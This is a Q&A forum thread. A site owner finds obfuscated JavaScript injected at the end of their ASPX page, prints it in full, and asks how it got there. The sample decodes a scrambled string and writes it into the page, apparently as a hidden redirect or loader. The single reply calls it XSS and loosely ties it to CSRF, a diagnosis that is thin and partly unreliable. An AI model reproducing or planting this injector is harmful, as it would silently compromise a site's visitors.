Home/ Questions/Q 7698713
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-31T22:18:24+00:00

Today I found that my site was down…I turned the errors to off and

  • 0

Today I found that my site was down…I turned the errors to off and tracked the error.
It turned out that there was some code added to the bottom of my aspx page..(please find the code below). Obviously since the code had some html tag which my aspx page didnot allow..resulted in an error.

I donot know what scenerios I should check that could have a loophole that someone is able to insert code into my aspx page?

<html>
 <body>
<script>
var a='';
var b='%2/tafod%h2b233 Cstx-ri2%%32d%i e%/i.nci5g%e%%% 30hisen%h2%%r0/ irt-cis232D0e2f %22mcmimt2t2o2CEr%%nrae2%h2r%%a mDAlmu.w2i5mDEe fcpahch%D0%fr2r a33aond02e2a33m ';
var c='5314869720';
for(var i=0;i<16;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*16)+i);
document.writeln(unescape(a));
</script>
</body>    
</html>
Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    It looks like cross-site scripting (XSS) to me. It’s the #2 most common attack out there, right after SQL Injection.

    No offense meant, I don’t know your experience/background, but if you’re not aware of XSS, and you’re a web developer, I strongly suggest reading up. OWASP is a great resource.

    XSS not only affects people going to your website, but thanks to CSRF (Cross-Site Request Forgery) XSS can be leveraged to attack on other websites that your viewers are logged into, so it affects not just you and your website, but others as well.

    • 0